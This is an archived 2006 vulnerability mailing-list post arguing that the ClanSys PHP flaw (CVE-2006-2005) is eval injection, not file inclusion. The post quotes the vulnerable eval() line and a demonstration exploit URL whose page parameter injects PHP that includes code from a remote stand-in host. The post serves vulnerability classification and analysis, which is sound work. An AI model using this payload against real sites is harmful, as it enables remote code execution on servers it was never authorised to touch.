[VIM] ClanSys issue might be eval injection, not file inclusion
Steven M. Christey
coley at mitre.org
Tue May 2 17:31:42 EDT 2006
Ref:
CVE-2006-2005
Advisory: Clansys <= 1.1 PHP Code Insertion Vulnerability.
http://www.securityfocus.com/archive/1/archive/1/431873/100/0/threaded
This looks like eval injection, not file inclusion, as most VDBs seem
to be claiming.
from the post:
You can found vulnerable code at line 126 as an
Code->
eval("?>" . $output);
<-Code
Purely nice coding isn't it?;)
That's a funny-looking eval to me with the "?>" starting out, but
presumably the $page variable feeds into $output.
Where people got tripped up on file inclusion was in the demonstration
exploit:
http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?
Note that the page parameter actually uses PHP <?> sequences to
execute the include statement. Using the code above, we would have:
eval("?>" . "<?include($s);?>");
which is
?><?include($s);?>
Turns out that the leading "?>" is a hint to eval() to support parsing
of "<?" and "?>" sequences - otherwise you'd get a parse error. Cute.
- Steve
More information about the VIM
mailing list